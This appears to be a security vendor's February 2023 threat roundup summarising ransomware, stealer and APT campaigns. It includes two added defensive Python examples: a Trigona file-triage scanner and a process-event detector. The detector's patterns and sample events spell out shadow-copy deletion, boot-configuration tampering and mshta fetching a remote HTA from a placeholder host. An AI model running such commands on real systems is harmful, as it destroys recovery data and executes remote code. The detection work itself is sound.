
Cyber Threat Breakdown February 2023

February might be the shortest month of the year, but cyber attackers are doing their best to make it count.

Here is a summary of February’s main attacks, indexed for easy navigation.

The Newcomers

XORDDOS Malware Strikes Again
Ice Breaker APT Group Analysis
DarkBit Demands Ransom from Technion University
Cl0p Ransomware Targets Linux Systems
New Mimic Ransomware Abuses Everything APIs
MortalKombat Ransomware Targets US Systems
Mylobot Malware Brings Sophistication to Botnets

The Comebacks

Ukraine Government Sector Targeted With The DolphinCape Information Stealer
Ukraine CERT-UA: Compromised Email Address Used To Deliver Malware Variants
Trigona Ransomware Analysis
Vector Stealer Targets RDP Files For Exfiltration
Massive ESXiArgs Ransomware Attack Targets VMware ESXi Servers Worldwide
Goot Camp GootLoader Operation
Water Dybbuk Uses Open-Source Toolkits For BEC Campaign
Ransomware Attacks On Critical Infrastructure Fund DPRK Malicious Cyber Activities
NewsPenguin Targets Pakistan With Espionage Tool
Mustang Panda APT Group Targets Europe With PlugX Backdoor
Seven Days Of The Collect, Exfiltrate, Sleep, Repeat Spin Cycle
AsyncRAT Being Distributed As Windows Help File
Hiding HTML Smugglers In Your Inbox
HardBit 2.0 Ransomware
Chinese Espionage Group Tonto Team Fails to Compromise Group-IB
CatB Ransomware Demands 50 Bitcoin via Email
Havoc Framework Allows Advanced Evasion Techniques
IcedID Malware Spreads Through Emails and Fake Software Sites
Government Organizations Targeted with Havoc C2 Framework

The Oldies

Mirai Botnet Delivers Medusa Botnet To Target Linux Users
TA471 Targets Ukrainian Government Websites With Malware (CERT-UA6060)
US CERT Alert – Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

The Newcomers

XORDDOS Malware Strikes Again

Cymulate Research Lab detected a new variant of the XORDDOS malware, which was analyzed to identify the Command and Control (C&C) IP address and indicators of the malware’s activity on a deployed machine. Similar malware and code were also identified by Intezer.

Ice Breaker APT Group Analysis

A new threat actor, Ice Breaker APT, is using a specific social engineering technique to gain access to a target’s network. Analysts are still investigating, but have released information about the attacker’s Modus Operandi, attack chain, and ways to mitigate the threat, along with supported IOCs, TTPs, and Yara.

DarkBit Demands Ransom from Technion University

A new group called DarkBit has claimed responsibility for a ransomware attack on Israel’s Technion University, demanding $1.7 million in ransom to be paid within 48 hours. The group has threatened to increase the amount by 30% if the ransom is not received in time. DarkBit shared a messenger ID for the Tox secure messaging app, which victims are told to use to contact the group about recovering their encrypted files.

Cl0p Ransomware Targets Linux Systems

SentinelLabs has detected the first Linux variant of the Cl0p ransomware, which contains a flawed encryption algorithm that makes it possible to decrypt locked files without paying the ransom. SentinelLabs has published a free decryptor for this variant. The ELF Cl0p variant is built along the same lines as the Windows version, with small differences attributable to the operating system, and appears to be in its initial development phases. The ransomware targets specific folders, their subfolders, and all files regardless of type.

New Mimic Ransomware Abuses Everything APIs

Trend Micro researchers discovered a new ransomware named Mimic that abuses the APIs of the Everything Windows filename search engine to query files that will be encrypted. This ransomware targets Russian and English-speaking users, with multiple capabilities such as deleting shadow copies and terminating applications and services.

MortalKombat Ransomware Targets US Systems

A new financially motivated campaign is using a variant of the Xortist ransomware, named MortalKombat, and the Laplas clipper to conduct financial fraud. The Laplas clipper steals cryptocurrency by hijacking crypto transactions, while MortalKombat is a less sophisticated variant of the Xortist ransomware that targets system files and applications. It corrupts system folders and disables the Windows Run command window, among other things, and demands payment in Bitcoin.

Mylobot Malware Brings Sophistication to Botnets

Researchers have discovered a new malware called MyloBot that features advanced evasion, infection, and propagation techniques, which implies that the authors have experience and heavy infrastructure. Among the techniques employed are anti-VM, anti-sandbox, and anti-debugging checks, reflective EXE loading, and process hollowing. The malware allows attackers to gain full control of the infected machine, enabling them to add payloads for other purposes such as banking Trojans, keyloggers, and distributed denial of service (DDoS) attacks.


The Comebacks

Ukraine Government Sector Targeted With The DolphinCape Information Stealer

A spear-phishing campaign targeting the government sector of Ukraine has been discovered by researchers. The attackers used a malicious attachment that appeared to have been sent from the State Emergency Service of Ukraine. Once the attachment was opened, VBScript code created a scheduled task for persistence, and a PowerShell script downloaded the DolphinCape information stealer. The malware is capable of exfiltrating system information and taking screenshots of the infected device.

Ukraine CERT-UA: Compromised Email Address Used To Deliver Malware Variants

An adversary was found to be using a compromised e-mail address to deliver phishing emails with a malicious PDF attachment. The files used in the attack were protected by VMProtect to hinder analysis. Successful intrusions resulted in systems being infected with variants from the RomCom, FateGrab, and StealDeal malware families.

Trigona Ransomware Analysis

Trigona ransomware, which first appeared on the threat landscape in late 2022, threatens to release stolen data if the ransom is not paid. The ransomware appends “._locked” to encrypted files and drops a ransom note in HTML format with instructions on how to retrieve the locked files. The threat actors behind the ransomware offer to decrypt three files for free to prove that the victims will get their sensitive data back.
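A defender-side triage check for the Trigona artefacts described above, written as an added example for this page (not the researchers' tooling): it walks a directory tree, counts files carrying the "._locked" suffix, and flags an HTML ransom note that is repeated across the affected folders. The sample tree, including the note name "how_to_decrypt.html", is constructed in a temporary directory.

```python
"""Scan a directory tree for Trigona-style encryption artefacts."""
import os
import tempfile
from collections import Counter
from pathlib import Path

LOCKED_SUFFIX = "._locked"                  # extension Trigona appends
NOTE_EXTENSIONS = {".html", ".hta", ".txt"}  # ransom notes are dropped as HTML


def triage(root) -> dict:
    """Return counts of locked files, affected directories and repeated notes."""
    locked = []
    note_names = Counter()  # the same note name in many folders is the tell
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(LOCKED_SUFFIX):
                locked.append(Path(dirpath) / name)
            elif Path(name).suffix.lower() in NOTE_EXTENSIONS:
                note_names[name.lower()] += 1
    affected_dirs = {p.parent for p in locked}
    repeated_notes = {n: c for n, c in note_names.items() if c >= 2}
    return {
        "locked_files": len(locked),
        "affected_dirs": len(affected_dirs),
        "repeated_notes": repeated_notes,
    }


def build_sample_tree(root) -> None:
    """Constructed victim layout (not real data): two folders hit, one untouched."""
    layout = {
        "finance": ["q4_report.xlsx._locked", "budget.docx._locked", "how_to_decrypt.html"],
        "hr/2022": ["contracts.pdf._locked", "how_to_decrypt.html"],
        "public": ["readme.txt", "logo.png"],
    }
    for sub, names in layout.items():
        folder = Path(root) / sub
        folder.mkdir(parents=True, exist_ok=True)
        for name in names:
            (folder / name).write_bytes(b"constructed sample content")


def run_demo() -> dict:
    """Build the constructed tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return triage(tmp)


if __name__ == "__main__":
    print(run_demo())
```

On a real host, point triage() at a mounted, read-only copy of the volume rather than the live system.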

Vector Stealer Targets RDP Files For Exfiltration

Vector Stealer is an information stealer that has been sold on underground forums since 2022. The malicious software is distributed via spear-phishing emails with malicious attachments and can search and exfiltrate a range of sensitive data from the infected device. The malware uses an unknown crypter, KoiVM for virtualization, and specifically targets Remote Desktop files.

Massive ESXiArgs Ransomware Attack Targets VMware ESXi Servers Worldwide

Attackers are targeting unpatched VMware ESXi servers with a two-year-old remote code execution vulnerability to deploy a new ESXiArgs ransomware. The vulnerability tracked as CVE-2021-21974 is caused by a heap overflow issue in the OpenSLP service and can be exploited by unauthenticated threat actors. To block incoming attacks, admins need to disable the vulnerable Service Location Protocol (SLP) service on ESXi hypervisors that have not been updated.

Goot Camp GootLoader Operation

The Goot Camp campaign targets users looking for business-related documents online to drop variants from the GootLoader malware family. The operation also uses the FONELAUNCH and SNOWCONE loaders to retrieve payloads from remote locations and load malicious code into memory. The malicious ZIP archive downloaded by victims launches a series of scripts that result in the system being infected with malicious software, including a Cobalt Strike beacon.

Water Dybbuk Uses Open-Source Toolkits For BEC Campaign

Water Dybbuk targets large companies worldwide with a Business Email Compromise (BEC) campaign to steal credentials. The group uses spear-phishing emails with malicious attachments that direct victims to malicious websites. The BadaxxBot toolkit and Evilginx framework, along with the JavaScript Obfuscator Tool, are used for the operation.

Ransomware Attacks On Critical Infrastructure Fund DPRK Malicious Cyber Activities

The US government has issued an advisory on malicious cyber activities involving North Korean ransomware campaigns. The TTPs associated with DPRK ransomware attacks include the acquisition of infrastructure, identity obfuscation, and VPN usage. The actors use various exploits of common vulnerabilities and exposures to gain access to networks.

NewsPenguin Targets Pakistan With Espionage Tool

The NewsPenguin threat actor targets Pakistani manufacturing, government, and military sectors with spear-phishing attachments. The final payload is an undocumented espionage tool that bypasses sandboxes and exfiltrates data from the infected system.

Mustang Panda APT Group Targets Europe With PlugX Backdoor

Mustang Panda distributed PlugX malware through malicious optical disc image (ISO) files to entities in Europe. Microsoft Windows registry run keys were used for persistence, while symmetric cryptography and standard encoding were used to exfiltrate sensitive data.

Seven Days Of The Collect, Exfiltrate, Sleep, Repeat Spin Cycle

Threat actors targeted users in a phishing campaign that delivered a job-application-themed, macro-enabled document. The malicious scripts made use of many OS-native tools as well as some legitimate open-source packages to carry out their tasks. The attackers successfully acquired access and exfiltrated some collected data but did not carry out further actions on the victims’ machines.

AsyncRAT Being Distributed As Windows Help File

A malware strain that uses the Windows Help file format (*.chm) has been on the rise since last year. A blank Help screen is displayed when the CHM file is executed, while a malicious script runs unnoticed by the user. This script uses mshta to execute a malicious command hosted at a remote address. The malware runs filelessly, making it difficult for users to identify what type of malware was executed.

Hiding HTML Smugglers In Your Inbox

Threat actors use HTML Smuggling techniques to deliver malware such as Qakbot, XWorm, Cobalt Strike, and IcedID. Spear-phishing emails are sent with HTML attachments that either directly drop an archive containing a malicious LNK file onto the victim machine or present a file impersonating a well-known vendor. The victim is then coerced into executing the archive or saving and executing the malicious file.

HardBit 2.0 Ransomware

The original HardBit is a ransomware threat that targets organizations to extort cryptocurrency payments for the decryption of their data. HardBit version 2.0 was introduced with samples seen throughout the end of 2022 and into 2023. The operators claim to steal sensitive data from their victims in addition to encrypting it. Unlike many of its peers, HardBit does not appear to have a leak site at this time and is not currently using the double extortion tactic.

The ransomware performs a number of steps to reduce the security posture of the host before encrypting victim data: gathering information about the victim host via Web-Based Enterprise Management (WBEM) and Windows Management Instrumentation (WMI) functions, dropping a custom HardBit file icon into the victim’s documents folder, deleting the Volume Shadow Copy Service and backups, editing the boot configuration, disabling many Windows Defender Antivirus features, terminating services, and ensuring the HardBit payload is automatically executed whenever the system is rebooted. The encryption phase walks all directories and files to locate data for encryption, overwrites the files, renames the encrypted files with a seemingly random file name followed by an identifier, and writes a plain-text ransom note and an HTML application (HTA) ransom note to the drive root and to every folder containing encrypted files. An image file is saved on the victim’s desktop and set as the system wallpaper via a Windows Registry update, and the HTA ransom note is executed to display interactive content.
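Detection logic for two behaviours described on this page, the CHM help file spawning mshta with a remote address (the AsyncRAT section) and the pre-encryption tampering with shadow copies, backups and boot configuration (the Mimic and HardBit sections), as an added example that is not part of the original post. It runs over constructed, Sysmon-style process-creation events; the field names and sample values are assumptions.

```python
"""Classify simplified process-creation events for the behaviours above."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # e.g. C:\Windows\hh.exe (the HTML Help viewer)
    image: str          # e.g. C:\Windows\System32\mshta.exe
    command_line: str


# An argument that points mshta at remote content (URL or UNC path).
REMOTE_ARG = re.compile(r"(https?://|\\\\[\w.-]+\\)", re.IGNORECASE)

# Command lines that remove recovery options before encryption starts.
TAMPER_PATTERNS = [
    (re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I), "shadow copies deleted (vssadmin)"),
    (re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I), "shadow copies deleted (wmic)"),
    (re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I), "backup catalog deleted"),
    (re.compile(r"bcdedit(\.exe)?\s.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
     "boot configuration edited"),
]


def basename(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the labels of every detection the event triggers."""
    hits = []
    if (basename(ev.parent_image) == "hh.exe" and basename(ev.image) == "mshta.exe"
            and REMOTE_ARG.search(ev.command_line)):
        hits.append("CHM launched mshta with remote content")
    for pattern, label in TAMPER_PATTERNS:
        if pattern.search(ev.command_line):
            hits.append(label)
    return hits


SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real host
    ProcEvent(r"C:\Windows\hh.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/update.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\user\AppData\Local\Temp\setup.hta"),  # local, benign here
    ProcEvent(r"C:\Users\user\Downloads\invoice.exe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent(r"C:\Users\user\Downloads\invoice.exe", r"C:\Windows\System32\bcdedit.exe",
              "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\notepad.exe", "notepad.exe notes.txt"),
]


def scan(events) -> list:
    """(image name, detection label) for every hit across the event list."""
    return [(basename(e.image), hit) for e in events for hit in classify(e)]


if __name__ == "__main__":
    for image, hit in scan(SAMPLE_EVENTS):
        print(f"{image}: {hit}")
```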

Chinese Espionage Group Tonto Team Fails to Compromise Group-IB

The Tonto Team, an espionage group known for targeting various strategic sectors since 2009, recently attempted to compromise the security firm Group-IB. They sent weaponized attachments to employees, masquerading as staff of legitimate organizations, and used fake email accounts created with GMX Mail. The campaign used the Royal Road weaponizer to create documents that exploit CVEs in the Microsoft Equation Editor. The Tonto Team also used the Bisonal.DoubleT backdoor and the TontoTeam.Downloader to collect intellectual property.

CatB Ransomware Demands 50 Bitcoin via Email

CatB ransomware emerged in late 2022, requiring victims to contact the threat actor via email only. The malware uses DLL sideloading to execute the payload and performs system checks to ensure it is not running on virtual machines or sandboxes. The ransomware demands 50 Bitcoin to obtain the decryption key and is packed using UPX.

Havoc Framework Allows Advanced Evasion Techniques

A new campaign targeting a government organization utilized the open-source Havoc framework, an advanced command and control framework capable of bypassing Microsoft Defender on the most current, fully updated version of Windows 11. Havoc is known for evasion techniques such as indirect syscalls and sleep obfuscation, which make detection and analysis difficult.

IcedID Malware Spreads Through Emails and Fake Software Sites

IcedID (also known as BokBot) is a backdoor that steals information and frequently leads to follow-on activity such as Cobalt Strike and VNC traffic. It is commonly distributed through email campaigns, and security analysts have also observed it being delivered through fake software sites promoted with Google ad traffic.

Government Organizations Targeted with Havoc C2 Framework

A new attack campaign was found that uses the Havoc Command and Control (C2) framework to target government organizations. The Havoc Demon agent created by the framework evades detection by disabling Event Tracing for Windows (ETW) and uses CreateThreadpoolWait() to decrypt and execute shellcode. The malware also loads Havoc’s Demon DLL reflectively and resolves virtual addresses using API hashing routines. The infection chain consists of several malicious files, including a decoy document, a downloader, a batch script, and a benign JPEG file.

The Oldies

Mirai Botnet Delivers Medusa Botnet To Target Linux Users

The Mirai botnet has been delivering the recently discovered Medusa botnet and stealer malware. Medusa Botnet has the capabilities to target victims for DDoS attacks, encrypt targets with ransomware, and build upon its infrastructure by acquiring infected machines. The malware uses open-source tools such as psutil, ZMap, scapy, and common binaries like telnet, SSH, and wget.

TA471 Targets Ukrainian Government Websites With Malware (CERT-UA6060)

The TA471 threat group, also known as Ember Bear, Lorec53, and UAC-0056, has targeted Ukrainian government websites. They used custom backdoors, web shells, and tunneling tools such as CredPump, HoaxPen, HoaxApe, Ngrok, and Gost to carry out the infection process.

US CERT Alert – Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

The United States National Security Agency (NSA), the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) have issued a joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities. The advisory supplements previous reports on malicious cyber actor activities involving DPRK ransomware campaigns, namely the Maui and H0lyGh0st ransomware. The report highlights the tactics, techniques, and procedures (TTPs) that DPRK cyber actors use to conduct ransomware attacks targeting South Korean and US healthcare systems. The observed TTPs include acquiring infrastructure, obfuscating identity, purchasing VPNs and VPSs, gaining access through exploits of common vulnerabilities and exposures, and spreading malware through Trojanized files for “X-Popup.” The actors spread malware by leveraging two domains: xpopup.pe.kr and xpopup.com.


That is all for now.


Stay cyber safe!
